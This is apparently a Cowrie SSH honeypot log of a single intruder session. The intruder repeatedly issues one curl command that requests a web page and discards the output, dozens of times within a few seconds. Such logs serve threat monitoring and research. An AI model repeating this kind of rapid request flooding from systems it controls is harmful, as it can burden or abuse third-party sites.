{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.248616Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.289127Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.290044Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.328868Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.329844Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.379710Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.380598Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.432443Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.433340Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.471769Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.472754Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.510542Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.511506Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.551030Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.552242Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.588883Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.589849Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.627002Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.628115Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.665276Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.666721Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.703457Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.704390Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.741525Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.742409Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.789390Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.790776Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.831445Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.832489Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.880692Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.881647Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.927007Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.928165Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:05.970432Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:05.971444Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.021130Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.022234Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.073369Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.074444Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.112392Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.113305Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.157030Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.157973Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.195927Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.197073Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.248908Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.250031Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.287311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.288979Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.326461Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.327682Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.366439Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.367470Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.407394Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.409413Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.447852Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.448920Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.485631Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.486460Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.523607Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.524703Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.561245Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.562092Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.600871Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.601723Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.648648Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.649798Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.687473Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.688341Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.724814Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.725636Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.762597Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.763523Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.804505Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.805325Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.841985Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.842898Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.880324Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.881356Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.925733Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.926578Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:06.963176Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:06.964018Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.000955Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.001809Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.050162Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.051067Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.091182Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.092114Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.130843Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.131708Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.171297Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.172169Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.210516Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.211598Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.248327Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.249325Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.286069Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.286968Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.323488Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.324567Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.361063Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.361858Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.407208Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.408036Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.455338Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.456420Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.494603Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.495458Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.534283Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.535119Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.571721Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.572851Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.609573Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.610370Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.648087Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.648907Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.685694Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.686544Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.723073Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.723885Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.760477Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.761283Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.798561Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.799406Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.846968Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.847817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.884546Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:42:07.885345Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:42:07.933711Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
